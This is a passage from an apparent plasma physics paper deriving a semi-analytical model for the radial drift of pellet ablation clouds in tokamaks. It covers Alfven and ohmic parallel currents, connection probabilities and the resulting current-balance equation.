plasmoid. The dominant ones are the emission of Alfven waves from the two ends of the plasmoid (Parks _et al._, 2000) and the flow of ohmic current parallel to the field lines (Pegourie _et al._, 2006). Mathematically, the evolution of the pellet cloud is governed by a vorticity equation similar to that used to describe so-called blob transport in the plasma scrape-off layer (Krasheninnikov _et al._, 2008). There is a wealth of experimental evidence for radial cross-field drift following pellet injection in current tokamaks and stellarators, e.g. in DIII-D (Baylor _et al._, 2007), ASDEX Upgrade (Lang _et al._, 1997), FTU (Terranova _et al._, 2007), MAST (Garzotti _et al._, 2010) and W7-X (Baldzuhn _et al._, 2019). 
However, due to the complexity of the theoretical models, computer codes developed to simulate the cross-field drift are computationally expensive (Strauss & Park, 1998, 2000; Aiba _et al._, 2004; Ishizaki & Nakajima, 2011). Therefore, simplified scaling laws, based on current experimental observations, are often used (Baylor _et al._, 2007; Koechl _et al._, 2018). Such expressions are of limited use for modelling ITER plasmas, which will have much higher temperatures and magnetic fields. In many cases, e.g. in the currently used disruption mitigation models, the radial drift of the pellet cloud is neglected altogether, for simplicity (Vallhagen _et al._, 2022). This is particularly problematic in the case of pure hydrogen pellets (Matsuyama, 2022), as their clouds can reach significant over-pressure due to negligible radiative energy losses, thus their drifts can be large and therefore affect the pellet penetration and material deposition substantially. The purpose of this paper is to develop a semi-analytical model for the cross-field drift motion of the ionized plasmoid, taking into account both the Alfven and ohmic currents. Our aim is to extract the key physical mechanisms described by the codes mentioned above and condense the result into a computationally efficient model. We consider current conservation directly, rather than formulating a vorticity equation for the system, generalising the description of the parallel connection of the ohmic current, and clarifying elements present in the existing literature. Factors such as the assumed shape of the plasmoid and our neglect of its structure along the magnetic field will quantitatively affect the plasmoid dynamics, but will not affect the qualitative nature of the results presented here. ## 2 Physical model The motion of the plasmoid arises because of an \(\mathbf{E}\times\mathbf{B}\)-drift in the direction of the major radius; the electric field builds up due to the current from the magnetic (curvature + \(\nabla B\)) drift of the particles, while the time-variation of this electric field gives rise to a partially cancelling polarization drift current. The total radial shift is determined by the drift velocity reached and its duration, which is approximately the time it takes for the cloud to expand one connection length along the field lines (\(t\sim\pi R_{\rm m}q/c_{s}\), where \(R_{\rm m}\) is the major radius, \(c_{s}\) is the sound speed and \(q\) is the safety factor or inverse of the rotational transform of the magnetic field). At this time, magnetic drift currents in the outboard and inboard portions of the cloud cancel out (analogously to a tokamak equilibrium). In order to mathematically describe the pellet dynamics, we formulate the current-conservation equation for the system, describing the balance between the divergent parts of the currents necessary to maintain quasineutrality. Working within a single-fluid formalism, we introduce the mass density \(\rho\), the mass flow velocity \(\mathbf{v}\), which appears in the total time derivative \(d_{t}=\partial_{t}+\mathbf{v}\cdot\nabla\), the total pressure including the electron and ion pressure components \(p=p_{e}+p_{i}\), as well as the current density and the magnetic field vectors, \(\mathbf{j}\) and \(\mathbf{B}\). In addition, \(\mathbf{B}=\mathbf{b}B\) with the unit vector \(\mathbf{b}\), the curvature vector of the field lines is \(\boldsymbol{\kappa}=\mathbf{b}\cdot\nabla\mathbf{b}\), and \(\mu_{0}\) denotes the vacuum permeability. 
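To give a feel for the drift duration \(t\sim\pi R_{\rm m}q/c_{s}\) quoted above, the short sketch below evaluates it for illustrative, ITER-like numbers. Both the parameter values and the isothermal hydrogenic sound-speed estimate \(c_{s}\approx\sqrt{2T/m_{i}}\) are assumptions made for this example only, not values or formulas taken from the analysis below.

```python
import math

# Illustrative parameters (assumed for this example, not from the paper)
R_m = 6.2         # major radius [m]
q = 1.5           # safety factor
T_eV = 5.0        # plasmoid temperature [eV]; the ablated material is cold
m_i = 3.34e-27    # deuterium ion mass [kg]
e = 1.602e-19     # J per eV

# Assumed plasmoid sound speed, c_s ~ sqrt(2*T/m_i) for equal electron and ion temperatures
c_s = math.sqrt(2.0 * T_eV * e / m_i)

# Approximate drift duration: time to expand one connection length along the field
t_drift = math.pi * R_m * q / c_s
print(f"c_s ~ {c_s:.3g} m/s, drift duration ~ {t_drift * 1e3:.3g} ms")
```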
The pellet cloud has higher pressure than the surrounding plasma since it is continuously heated by hot electrons from the latter (Aleynikov _et al._, 2019; Runov _et al._, 2021; Arnold _et al._, 2021). A current perpendicular to the magnetic field lines arises in response to this excess pressure, but we note that the dynamics involved in the drift of the plasmoid is slower than the timescale of compressional Alfven waves, so that the largest terms in the magnetohydrodynamic (MHD) force balance equation, \[\rho\frac{d\mathbf{v}}{dt}=\mathbf{j}\times\mathbf{B}-\nabla p, \tag{1}\] describe an approximately static force balance between the plasma pressure and the magnetic field. The total current takes the form \[\mathbf{j}=j_{\parallel}\mathbf{b}+\frac{\mathbf{B}\times\nabla p}{B^{2}}+ \frac{\rho}{B}\mathbf{b}\times\frac{d\mathbf{v}}{dt}, \tag{2}\] and the divergence of the diamagnetic current, the second term on the right, describes the charge accumulation due to the magnetic drifts. This is approximately given by \[\nabla\cdot\left(\frac{\mathbf{B}\times\nabla p}{B^{2}}\right)=\nabla\cdot \left[p\nabla\times\left(\frac{\mathbf{B}}{B^{2}}\right)\right]\approx\nabla \cdot\left(2p\frac{\mathbf{b}\times\nabla B}{B^{2}}\right)\equiv\nabla\cdot \mathbf{j}\mathbf{v}_{B}. \tag{3}\] Using \((\mathbf{b}\times\nabla B)/B=\mathbf{b}\times\boldsymbol{\kappa}\) we can write the expression for current conservation in the form \[0=\nabla\cdot\mathbf{j}\approx\nabla\cdot\left[j_{\parallel}\mathbf{b}+\frac {\mathbf{b}}{B}\times\left(2p\boldsymbol{\kappa}+\rho\frac{d\mathbf{v}}{dt} \right)\right]. \tag{4}\] The time-dependent term in (4) is the current due to the polarization drift, \[\mathbf{j}_{\hat{E}}=\rho\frac{\mathbf{b}}{B}\times\frac{d\mathbf{v}}{dt}.\] The resistive-MHD Ohm's law \(\mathbf{E}+(\mathbf{v}\times\mathbf{B})=\eta\mathbf{j}\) implies that in the limit of modest resistivity \(\eta\), the perpendicular mass flow \(\mathbf{v}_{\perp}\) is dominated by \(\mathbf{E}\times\mathbf{B}\) motion. For the low-frequency process of interest inside the pellet cloud, the electric field is electrostatic \(\mathbf{E}=-\nabla\phi\), with the electrostatic potential \(\phi\), and thus we write the cross-field velocity as \(\mathbf{v}_{\perp}\approx(\mathbf{b}\times\nabla\phi)/B\). The parallel current (\(j_{\parallel}\)) must adjust to make the total current divergence free; that is \[\nabla\cdot\mathbf{j}=\nabla\cdot\left[j_{\parallel}\mathbf{b}+\mathbf{j}_{ \nabla B}+\mathbf{j}_{\hat{E}}\right]=0.\] Eliminating the contribution which describes the balance of the diamagnetic and parallel currents in the background equilibrium plasma, we are left with the perturbation of the current continuity equation driven by the excess pressure of the plasmoid. In the very early phase of plasmoid acceleration, \(\mathbf{j}_{\nabla B}\) is approximately balanced by \(\mathbf{j}_{\hat{E}}\). At such short times, the length of the pellet cloud is much shorter than the distance around the torus, \(t\ll R_{m}q/c_{s}\), and the plasmoid is thus poloidally and toroidally localised. If the aspect ratio of the torus is large, the curvature vector of the magnetic field is approximately \(\boldsymbol{\kappa}=-\hat{R}/R_{m}\), where \(R_{m}\) is the major radius and \(\hat{R}\) the unit vector in the direction of increasing major radius. For convenience we introduce the unit vector \(\hat{Y}=\mathbf{b}\times\hat{R}\), so the direction of \(\mathbf{j}\mathbf{v}_{B}\) is \(-\hat{Y}\), which is nearly vertical. 
As the electric field rises in this early stage, \(\mathbf{j}_{\hat{E}}\) evolves to point in the \(\hat{Y}\) direction everywhere in the cloud. Later the \(j_{\parallel}\) term starts to dominate over \(\mathbf{j}_{\hat{E}}\) in balancing \(\mathbf{j}_{\nabla B}\), setting the quasi-steady speed of the plasmoid. We may integrate (4) over some convenient volume \(V\) with boundary \(\partial V\), and apply the divergence theorem to obtain \[0=\int_{\partial V}\left[\left(\frac{\rho}{B}\frac{d\mathbf{v}}{dt}-\frac{2p}{BR_ {m}}\hat{Y}\right)+j_{\parallel}\mathbf{b}\right]\cdot\hat{n}dS, \tag{5}\] where \(\hat{n}\) is a unit vector pointing outwards from \(V\). We align the integration volume \(V\) with the cloud by choosing it to be a magnetic flux tube extending along the length of the cloud. Since the magnetic field lines are curved, the end faces of the flux tube, which we denote by \(\delta S\), are not quite parallel. We choose the flux tube to have rectangular cross section with the lower boundary running through the middle of the cloud, separating the upper, red, and lower, blue, parts of the cloud shown in Fig. 1, where the integration volume \(V\) is sketched. The length of the cloud along the field line is \(L_{\rm cld}\), and the upper boundary of the domain is located just above the cloud. For simplicity, we assume that the pellet is injected in the horizontal midplane and therefore (by symmetry) is always located in the middle of the cloud in the direction along the magnetic field and in the vertical direction. The surface normal \(\hat{y}\) of the lower surface of \(V\) coincides with \(\hat{Y}\) in the poloidal plane that contains the pellet, and rotates in the poloidal plane as one follows the field line along the flux tube \(V\). The relation between \(\hat{y}\), \(\hat{Y}\) and \(\hat{R}\) is \[\hat{y}=\cos\theta\,\hat{Y}+\sin\theta\,\hat{R}, \tag{6}\] where \(\theta\approx\varphi/q\approx z/qR_{\rm m}\) is the poloidal angle, \(\varphi\) is the toroidal angle and \(z\) is the coordinate along the magnetic field lines; we take \(z=0\) in the poloidal plane of the pellet. The dimensions of the integration volume in the \(\hat{R}\) and \(\hat{y}\) directions are \(\Delta R\) and \(\Delta y\), respectively. Figure 1: Schematic views of the ablation cloud and the field lines connecting the various parts of it from different perspectives; the green lines indicate the boundaries of the integration volume \(V\): a) parallel currents and magnetic drift currents indicated in the \(y-z\) plane, b) from the side looking in the toroidal direction, c) from the top and d) with unwrapped field lines (black dashed), connecting different parts of the cloud after a distance \(L\). The cloud expands at the speed of sound \(c_{s}\) in both directions, so that \(L_{\rm cld}=2c_{s}t\). We assume the pellet ablation cloud to be symmetric in \(z\) (and \(y\)) with respect to the \(y\) (\(z\)) axis in figure a). The pellet is indicated in figures b) and c) by the black dot, from which the cloud diverges. 
The contribution from the first term, \(\mathbf{j}_{\hat{\mathbf{E}}}\), to (5) thus becomes \[I_{\hat{\mathbf{E}}}=\int_{-L_{\mathrm{cld}}/2}^{L_{\mathrm{cld}}/2}\int_{0}^{ \Delta R}-\frac{\rho}{B^{2}}\frac{dE_{y}}{dt}\hat{y}\cdot\hat{y}dRdz=-\frac{ \bar{n}\langle m_{i}\rangle\Delta R}{(1+\langle Z\rangle)B^{2}}\frac{dE_{y}}{ dt}, \tag{7}\] where we have noted that the field-line-integrated mass density is \(\bar{n}\langle m_{i}\rangle/(1+\langle Z\rangle)\) (neglecting the mass of the electrons), \(\bar{n}=\sum_{i}\bar{n}_{i}+\bar{n}_{e}=\sum_{i}\bar{n}_{i}(1+\langle Z\rangle)\) is the field-line integrated total density of all species (including electrons) inside the cloud (with \(\bar{n}_{i}\) and \(n_{e}\) denoting the field line integrated density of ion species \(i\) and electrons, respectively), \(\langle m_{i}\rangle\) is the average ion mass inside the cloud and \(\langle Z\rangle\) is the average ion charge inside the cloud. Considering the second term, \(\mathbf{j}_{\hat{\mathbf{V}}B}\), we assume that the pressure is constant along the field lines inside the cloud, with equal electron and ion temperatures, denoted by \(T\). The contribution from the second term of (5) then becomes \[I_{\hat{\mathbf{V}}B} = \int_{-L_{\mathrm{cld}}/2}^{L_{\mathrm{cld}}/2}\int_{0}^{\Delta R }\frac{2(p-p_{\mathrm{bg}})}{BR_{\mathrm{m}}}\hat{Y}\cdot\hat{y}dRdz=\int_{-L_ {\mathrm{cld}}/2}^{L_{\mathrm{cld}}/2}\frac{2(p-p_{\mathrm{bg}})\Delta R}{BR_ {\mathrm{m}}}\cos{\left(\frac{z}{qR_{\mathrm{m}}}\right)}dz \tag{8}\] \[= \frac{4(p-p_{\mathrm{bg}})\Delta Rq}{B}\sin{\left(\frac{L_{ \mathrm{cld}}}{2qR_{\mathrm{m}}}\right)}=\frac{4(\bar{n}T-L_{\mathrm{cld}}n_{ \mathrm{bg}}T_{\mathrm{bg}})\Delta Rq}{BL_{\mathrm{cld}}}\sin{\left(\frac{L_{ \mathrm{cld}}}{2qR_{\mathrm{m}}}\right)},\] The background pressure \(p_{\mathrm{bg}}\) enters via the contribution from the upper surface of the integration volume. We see, as noted in the introduction, that the assumptions simplifying the parallel structure of the cloud will quantitatively affect the final results, but accounting for parallel structure will not affect the essential qualitative description of the plasmoid motion. The key to calculating how the parallel current contributes to the drift motion is to find the relation between the parallel current \(j_{\parallel}\), which flows through the background plasma (beyond the ends of the cloud), and the electric field responsible for \(\mathbf{E}\times\mathbf{B}\) motion, which are related via the electrostatic potential \(\phi\) along the plasmoid length. As the pellet flies through the plasma, it undergoes continuous ablation and thus generates a sequence of ablation clouds residing on different field lines. Each of these clouds expands along the magnetic field whilst drifting across it. It is important to note that the cloud drift velocity exceeds the speed of the pellet. We can thus regard the pellet as stationary, which simplifies our discussion. With these facts in mind, we now study the evolution of the electrostatic potential along each field line. We fix our attention on one particular field line and denote by \(\tau\) the time that has elapsed since pellet material first arrived there. This time is in general different from the time \(t\) that has passed since this material was originally ablated from the pellet. 
(Alternatively, in the limit of very high electrical conductivity, it is possible to regard the field lines as "frozen into" the pellet cloud, in which case it is better to consider a field line moving with the pellet cloud. In this case \(t=\tau\).) It is convenient to introduce \(L\), the distance along a field line, outside the cloud, which connects the two ends of the cloud; note that \(L\) depends on the coordinates identifying a field line and may be different for different field lines in our integration volume \(V\). In our large-aspect-ratio approximation, the value of \(L=2\pi R_{\mathrm{m}}N\) is equal to the circumference of the torus, \(2\pi R_{\mathrm{m}}\), times the number of turns, \(N\), after which the field line connects the two end caps of \(V\). This number will in general vary over the cross section of the flux tube. The evolution of the electrostatic potential along a field line connecting the oppositely charged parts of the cloud after a length \(L\) is illustrated in figure 2. The physical picture of the evolution of this potential is the following: the interface between the end of the plasmoid and the background plasma represents an evolving perturbation, expanding along the field lines at the local sound speed \(c_{s}\) of the pellet material inside the plasmoid. The potential difference between the cloud and the background plasma, along with the plasmoid drift, excite shear Alfven waves, which are emitted from these interfaces and propagate away from the plasmoid, along field lines through the background plasma, at the local Alfven speed, \(C_{A}\). For \(\tau\ll L/(2C_{A})\), the potential perturbations associated with the Alfven waves will not have reached each other yet. Thus, the current carried away from the ends of the cloud is determined by the polarisation current resulting from the time-varying potential at the wave fronts, giving rise to the Alfven current (Scholer, 1970). When \(\tau=L/(2C_{A})\), the waves emerging from the opposite sides of the cloud meet and interfere with each other. Eventually, a steady-state, without propagating waves, is reached when \(\tau\gg L/(2C_{A})\). At this stage, the parallel current is instead determined by Ohm's law. Thus, the dominant contribution to the \(j_{\parallel}\) current, in the initial phase, is associated with the Alfven wave propagating from the ends of the drifting cloud (Parks _et al._, 2000). It is proportional to the electric field inside the cloud, as outlined below, and can be described by the so-called Alfven conductivity, \(\Sigma_{A}=1/R_{A}=1/(\mu_{0}C_{A})\). In the later stages, the ohmic current along the field lines connecting the oppositely charged parts of the cloud (Pegourie _et al._, 2006) becomes dominant. There is also a contribution to the current caused by the drift resulting from the cloud viscosity, which has been shown by Rozhansky _et al._ (2004) to be less significant and will be neglected here. ### Parallel current When calculating the contribution of \(j_{\parallel}\) to the integral (5), only the end caps (area \(\delta S\)) of this flux tube will contribute, as otherwise \(\mathbf{b}\cdot\hat{n}=0\). Consider first the contribution from a smaller flux tube, whose end caps have area \(\partial s_{<}\), that only contains field lines for which \(C_{A}t\ll L/2\), that is, for which Alfven waves propagating from the ends of the cloud have not had time to meet. 
Figure 2: Sketch of the electrostatic potential \(\phi(z)\) along a field line connecting the two ends of the cloud, at different values of \(y\), characterised by potentials \(\phi_{A}\) and \(\phi_{B}\). We show three representative times: At \(\tau_{1}<L/(2C_{A})\) potential perturbations propagating out from the ends of the cloud at the Alfvén speed have not yet met along the field line (solid black line). The perturbations meet at \(\tau_{2}=L/(2C_{A})\) (dashed blue). After a long time (compared to Alfvén time scales), \(\tau_{3}\gg L/(2C_{A})\), the potential has reached a quasi-steady state where an ohmic current flows between the connected ends of the cloud (dash-dotted green). Note that the cloud length \(L_{\rm cld}\) is exaggerated in the figure; in reality it is much shorter than the distance along the field line between the connected ends of the cloud. As the parallel electric field \(E_{\parallel}\) is small in the established hot background plasma outside the cloud, except at the wave front, we can express \(E_{\parallel}\) in Fourier space as \[E_{\parallel}=-ik_{\parallel}\phi+i\omega A_{\parallel}\approx 0,\] and relate the electrostatic and vector potential via the Alfven speed \[A_{\parallel}=\phi/(\omega/k_{\parallel})=\phi/C_{A}.\] Using Ampere's law we can relate \(j_{\parallel}\) to \(A_{\parallel}\) and thence to \(\phi\) as \[j_{\parallel}=-\frac{\nabla_{\perp}^{2}A_{\parallel}}{\mu_{0}}=-\frac{\nabla_{\perp}^{2}\phi}{\mu_{0}C_{A}}. \tag{9}\] Assuming that the whole cloud moves at the same radial velocity, the electric field \(E_{y}=-\partial\phi/\partial y\) must be constant inside the cloud, i.e. \[\nabla_{\perp}^{2}\phi=-E_{y}\left[\delta(y-\Delta y)-\delta(y+\Delta y)\right], \tag{10}\] where \(\delta\) denotes the Dirac delta function. If we set \(\partial s_{<}\) to the part of \(\partial S\) for which \(C_{A}t<L/2\), the contribution from the Alfven part of the parallel current becomes \[I_{\parallel,A} =2\int_{\partial s_{<}}\frac{-E_{y}\delta(y-\Delta y)}{\mu_{0}C_{A}}dydR \tag{11}\] \[=-2\int_{0}^{\Delta R}\int_{0}^{\Delta y}\Theta(\partial s_{<};y,R)\frac{E_{y}\delta(y-\Delta y)}{\mu_{0}C_{A}}dydR\] (12) \[=-2P_{A}\Delta R\frac{E_{y}}{\mu_{0}C_{A}}=-2P_{A}\Delta R\frac{E_{y}}{R_{A}}, \tag{13}\] where the function \(\Theta(\partial s;y,R)\) is \(1\) for the \(y\) and \(R\) values corresponding to field lines crossing the surface \(\partial s\) where \(C_{A}t<L/2\) is satisfied, and zero otherwise; and \(P_{A}\) is the fraction \(\partial s_{<}/\partial S\). Now consider the field lines crossing the area \(\partial s_{>}\), i.e., the field lines for which \(C_{A}t\gg L/2\). On these field lines, the Alfven waves emanating from either side of the cloud have already met and decayed, and there is no longer any polarisation current. Only the ohmic current \(j_{\parallel}\) remains and, being divergence free, it must be constant along the field in the large-aspect-ratio limit. This current is related to the parallel electric field by Ohm's law, \[j_{\parallel}=\sigma_{\parallel}E_{\parallel}=-\sigma_{\parallel}\nabla_{\parallel}\phi.\] As \(j_{\parallel}\) is constant along the field lines, so is \(\nabla_{\parallel}\phi\), which means that \[j_{\parallel}=\sigma_{\parallel}E_{\parallel}=-\sigma_{\parallel}\frac{\phi-\phi_{B}}{L}=-\sigma_{\parallel}\frac{2E_{y}(y-y_{B})}{L}, \tag{14}\] where \(y\) denotes the vertical coordinate at which the field line emanates from one end of the cloud and \(y_{B}\) that where it hits the other end.
The electric field \(E_{y}\) has been assumed to be constant along the field line. Let us now denote by \(\partial s_{i}\) the subset of \(\partial s_{>}\) containing only field lines connecting to the opposite side of the cloud after a distance \(L=2\pi R_{\rm m}i\), i.e. connecting after exactly \(i\) toroidal turns. If \(i\gg 1\), the connection is essentially random, so that the values of \(y\) and \(y_{B}\) are uncorrelated and \(\int y_{B}dy=0\). The total ohmic current flowing along field lines in \(\partial s_{i}\) thus becomes \[\begin{split}I_{\parallel,{\rm ohm}}^{(i)}(\tau\gg L/(2C_{A}))&=-2\int_{\partial s_{i}}\sigma_{\parallel}\frac{E_{y}(y-y_{B})}{L}dydR\\ &=-2P_{i}\int_{0}^{\Delta y}\int_{0}^{\Delta R}\Theta(\partial s_{>};y,R)\sigma_{\parallel}\frac{E_{y}(y-y_{B})}{2\pi R_{\rm m}i}dydR\\ &=-P_{i}\sigma_{\parallel}\frac{E_{y}\Delta y^{2}\Delta R}{2\pi R_{\rm m}i},\end{split} \tag{15}\] where \(P_{i}=\partial s_{i}/\partial S\) is the fraction of the cloud connecting to the opposite side after \(i\) toroidal turns. This result is similar to the corresponding expression, Eq. (2), in (Commaux _et al._, 2010), up to an order unity factor accounting for the finite electron collision time. The total ohmic current is obtained by summing over all values of \(i\). For \(\tau\gtrsim L/(2C_{A})\), the current will make a transition from 0 to \(I_{\parallel,\mathrm{ohm}}^{(i)}(\tau\gg L/(2C_{A}))\)\({}^{1}\) over a time scale similar to \(L/C_{A}\), so that we can write \[I_{\parallel,\mathrm{ohm}}=\sum_{i=1}^{\infty}f\left(\frac{\tau}{L/(2C_{A})}\right)I_{\parallel,\mathrm{ohm}}^{(i)}(\tau\gg L/(2C_{A})), \tag{16}\] where \(f(0)=0\) and \(f\to 1\) for large arguments. Footnote 1: This only applies to field lines in the interior of \(\partial S\); at the boundary of \(\partial S\) the initial current is \(I_{\parallel,A}\). However, as the ohmic current is proportional to the cross section area, the boundary of \(\partial S\) gives a negligible contribution to the ohmic current. The detailed form of \(f\) is determined by the interaction of the Alfven waves propagating from opposite sides of the cloud, which is outside the scope of the present work. Here we instead make the approximation that \(f=\theta\left(\frac{\tau}{L/(2C_{A})}-1\right)\), where \(\theta\) is the Heaviside step-function. This is also used in Pegourie _et al._ (2006). Note that this assumption on \(f\) underestimates the time until the onset of the ohmic current, thus overestimating the importance of the ohmic current contribution. With this assumption for \(f\), we can write the total ohmic current as \[I_{\parallel,\mathrm{ohm}}=\sum_{i=1}^{N}I_{\parallel,\mathrm{ohm}}^{(i)}(\tau>L/(2C_{A})), \tag{17}\] where \(N=\lfloor 2C_{A}\tau/(2\pi R_{\mathrm{m}})\rfloor=\lfloor\tau/t_{0}\rfloor\) is the maximum number of toroidal turns the Alfven wave front has had time to make, with \(t_{0}\) the time for the Alfven wave to propagate one turn around the torus, accounting for the fact that emission is from both ends of the cloud. The notation \(\lfloor x\rfloor\) gives the greatest integer less than or equal to \(x\). #### 2.1.1 Fraction of the cloudlet cross section connected to the opposite side The fraction \(P_{i}\) of the cloudlet cross-section that connects to the opposite side during the \(i^{\mathrm{th}}\) turn can be calculated as follows. As we shall see, most of the contribution to the current comes from terms with \(i\gg 1\), i.e., from field lines that encircle the torus many times before connecting the two ends of the cloud.
According to Weyl's lemma (Helander, 2014), whether a given field line starting from one side of the cloud connects to the other side in a large number of turns is essentially random. We can thus speak of the probability of such a connection, and this probability depends on the fraction of the poloidal cross-section that the cloudlet covers, which is \(\Delta y/(\pi r)\), where \(r\) is the characteristic minor radius at the cloudlet position. Therefore, the total connected fraction \(P_{\mathrm{con}}^{\mathrm{tot}}\) increases between turn \(N\) and \(N+1\) in the following way: \[P_{\mathrm{con}}^{\mathrm{tot}}(N+1)-P_{\mathrm{con}}^{\mathrm{tot}}(N)=\frac{\Delta y}{\pi r}(1-P_{\mathrm{con}}^{\mathrm{tot}}(N)). \tag{18}\] The solution of this difference equation is \[P_{\mathrm{con}}^{\mathrm{tot}}(N)=1-\left(1-\frac{\Delta y}{\pi r}\right)^{N}, \tag{19}\] and we can now express \[P_{i}=P_{\mathrm{con}}^{\mathrm{tot}}(i+1)-P_{\mathrm{con}}^{\mathrm{tot}}(i)=\frac{\Delta y}{\pi r}\left(1-\frac{\Delta y}{\pi r}\right)^{i}. \tag{20}\] This estimate is consistent with figure 3 in (Pegourie et al., 2006). We can also express the fraction \(P_{A}\) (determining the size of the Alfven current) as \(P_{A}=1-P_{\rm con}^{\rm tot}\). Combining equations (15), (17) and (20), the ohmic current contribution can now be expressed as \[I_{\parallel,{\rm ohm}}=-\sum_{i=1}^{N}P_{i}\sigma_{\parallel}\frac{E_{y}\Delta y^{2}\Delta R}{2\pi R_{\rm m}i}=-\frac{E_{y}\Delta R}{R_{\rm eff}}, \tag{21}\] with the inverse effective resistivity \(1/R_{\rm eff}\) given by \[\frac{1}{R_{\rm eff}}=\sum_{i=1}^{N}P_{i}\sigma_{\parallel}\frac{\Delta y^{2}}{2\pi R_{\rm m}i}=\sigma_{\parallel}\frac{\Delta y^{3}}{2\pi R_{\rm m}\pi r}\sum_{i=1}^{N}\frac{1}{i}\left(1-\frac{\Delta y}{\pi r}\right)^{i}. \tag{22}\] For \(N\to\infty\) we may use \(\sum_{i=1}^{\infty}(1-x)^{i}/i=-\ln x\), giving \[\frac{1}{R_{\rm eff}}=\sigma_{\parallel}\frac{\Delta y^{3}}{2\pi^{2}R_{\rm m}r}\ln\frac{\pi r}{\Delta y}. \tag{23}\] Concerning when the \(N\to\infty\) limit is meaningful to take, we must appreciate that depending on the resistivity of the cloud, the cloud may or may not be frozen into the magnetic field, which determines whether field lines are dragged along with the cloud, or the field lines slip with respect to the cloud\({}^{1}\). It is worth re-iterating that the generation of Alfven waves by the propagating potential perturbation - and so the existence of Alfven resistivity - does not require the field lines to be frozen in on the drift time scale. Footnote 1: Fig. 3 of (Hoare et al., 2019) is a nice example from the scrape-off layer filament literature of exploring this transition numerically. As we will see later, the number of connected turns \(N\) becomes large during the drift motion, so that taking \(N\to\infty\) is a valid approximation for the majority of the drift motion, as long as the magnetic field diffusion is slow enough (i.e. the cloud temperature is high enough) that the cloud does not become disconnected from the field lines where the electrostatic potential has been set up. The picture becomes more complicated if the magnetic field diffusion time scale is fast compared to the drift motion. This is typically the case for low cloud temperatures (e.g. pellets doped with highly radiating impurities), where the conductivity in the cloud is low and the resistive diffusion coefficient is large.
In this case, the potential along a given field line will not only be determined by the local cloud properties, but will be affected by all material which has drifted past the field line under consideration. When pellet material first arrives, the Alfven current dominates. On the other hand, long after the ablation flow started to cross a given field line, the potential along this field line will reach a quasi-stationary profile similar to the case when the field line remains frozen into the cloud for a long time, and thus \(N\to\infty\) also in this case. As the pellet motion is typically slow compared to the other processes of interest, the latter limit should dominate for the majority of the ablated material in most cases even for low cloud temperatures. The fraction of field lines not yet connected to the opposite side of the cloud, \(P_{A}\), converges somewhat more slowly than the effective resistivity \(R_{\rm eff}\). We therefore keep \(N\) finite in the expression for \(P_{A}\) for hot clouds. For cold clouds, for the first material drifting past a new part of the background plasma, \(N\) remains equal to zero, and \(P_{A}=1\). However, as the potential reaches its quasi-stationary value, \(P_{A}\to 0\) for the whole drift motion (i.e. the parallel current will be dominated by the ohmic component). ### Current balance We are now finally ready to sum up the various contributions to the current balance and obtain an equation for \(E_{y}\) in terms of the parameters characterising the pellet cloud and the background plasma. From equation (5) we have \[\begin{split} 0&=\frac{I_{\nabla B}+I_{\dot{\mathbf{E}}}+I_{\parallel,A}+I_{\parallel,\text{ohm}}}{\Delta R}\\ &=\frac{4(\bar{n}T-L_{\text{cld}}n_{\text{bg}}T_{\text{bg}})q}{BL_{\text{cld}}}\sin\left(\frac{L_{\text{cld}}}{2qR_{\text{m}}}\right)-\frac{\bar{n}\langle m_{i}\rangle}{(1+\langle Z\rangle)B^{2}}\frac{dE_{y}}{dt}-2P_{A}\frac{E_{y}}{R_{A}}-\frac{E_{y}}{R_{\text{eff}}}.\end{split} \tag{24}\] Note that the factor \(\sin\left(\frac{L_{\text{cld}}}{2qR_{\text{m}}}\right)\) will start to oscillate when \(t\sim qR_{\text{m}}/c_{s}\), as \(L_{\text{cld}}\sim c_{s}t\), and the amplitude of the term in which this appears in (24) decreases as \(1/L_{\text{cld}}\propto 1/t\); this oscillation, together with the pressure equilibration (which occurs when \(\bar{n}T=L_{\text{cld}}n_{\text{bg}}T_{\text{bg}}\)), effectively sets the time scale of the drift duration and eventually leads to a finite displacement for the drift. Also note that \(c_{s}t_{0}/qR_{\text{m}}\sim c_{s}/C_{A}\) is small for typical fusion plasma parameters, meaning that \(N\) becomes large during the drift duration, motivating us to take the upper limit of the sum in (22) to be infinite, when calculating \(R_{\text{eff}}\).
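To make the connection statistics concrete, the short sketch below (Python/NumPy) evaluates \(P_{i}\) from (20), accumulates the partial sums of \(1/R_{\rm eff}\) in (22), and compares them with the \(N\to\infty\) closed form (23). The numerical values of \(\Delta y\), \(r\), \(R_{\rm m}\) and \(\sigma_{\parallel}\) are illustrative placeholders only, not parameters taken from the text.

```python
import numpy as np

# Illustrative check of the connection-probability statistics and the
# effective resistivity sum; all parameter values are placeholders.
delta_y   = 1.25e-2   # cloud half-width in y [m]
r         = 1.0       # characteristic minor radius [m]
R_m       = 5.0       # major radius [m]
sigma_par = 1.0e7     # parallel conductivity [S/m]

x = delta_y / (np.pi * r)                 # probability of connecting per toroidal turn
i = np.arange(1, 20001)
P_i = x * (1.0 - x) ** i                  # eq. (20)

# Partial sums of 1/R_eff, eq. (22), as a function of the number of turns N
inv_Reff_N = np.cumsum(P_i * sigma_par * delta_y**2 / (2.0 * np.pi * R_m * i))

# N -> infinity closed form, eq. (23)
inv_Reff_inf = sigma_par * delta_y**3 / (2.0 * np.pi**2 * R_m * r) * np.log(np.pi * r / delta_y)

print("1/R_eff at N=100    :", inv_Reff_N[99])
print("1/R_eff at N=20000  :", inv_Reff_N[-1])
print("1/R_eff, closed form:", inv_Reff_inf)
print("unconnected fraction (1-x)^N at N=1000:", (1.0 - x) ** 1000)
```

With these placeholder numbers the partial sums approach the closed form once \(N\) exceeds a few times \(\pi r/\Delta y\), illustrating why the \(N\to\infty\) limit becomes adequate after the Alfven wave front has completed a few hundred toroidal turns.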
